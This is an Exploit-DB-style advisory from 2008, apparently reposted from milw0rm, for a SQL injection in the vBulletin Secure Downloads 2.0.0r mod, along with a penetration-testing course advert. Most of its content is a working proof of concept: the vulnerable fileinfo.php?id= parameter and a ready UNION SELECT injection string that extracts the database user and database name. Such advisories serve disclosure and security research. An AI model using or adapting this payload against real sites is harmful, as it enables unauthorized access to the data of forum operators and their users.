vBulletin Secure Downloads 2.0.0r - SQL Injection

EDB-ID:

7385

CVE:

N/A


Author:

Cnaph

Type:

webapps


Platform:

PHP

Date:

2008-12-08


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

[~] vBulletin (Mode Secure Downloads v2.0.0r) SQL Injection Vulnerability

[~] Mod : http://www.1src.com/freeware/download.php?id=1880

[~] Author : Cn4phux

[~] PoC :

 

[~] URL.com/fileinfo.php?id=[SQL]


[~] : 1797'+AND(0)+UNION+SELECT+1,1,1,1,1,'Cn4phux',0,0,0,1,0,1,0,0,0,0,0,USER(),DATABASE(),0,0,0,0,0,0,0+OR+'1'='0


//Cn4phux.

# milw0rm.com [2008-12-08]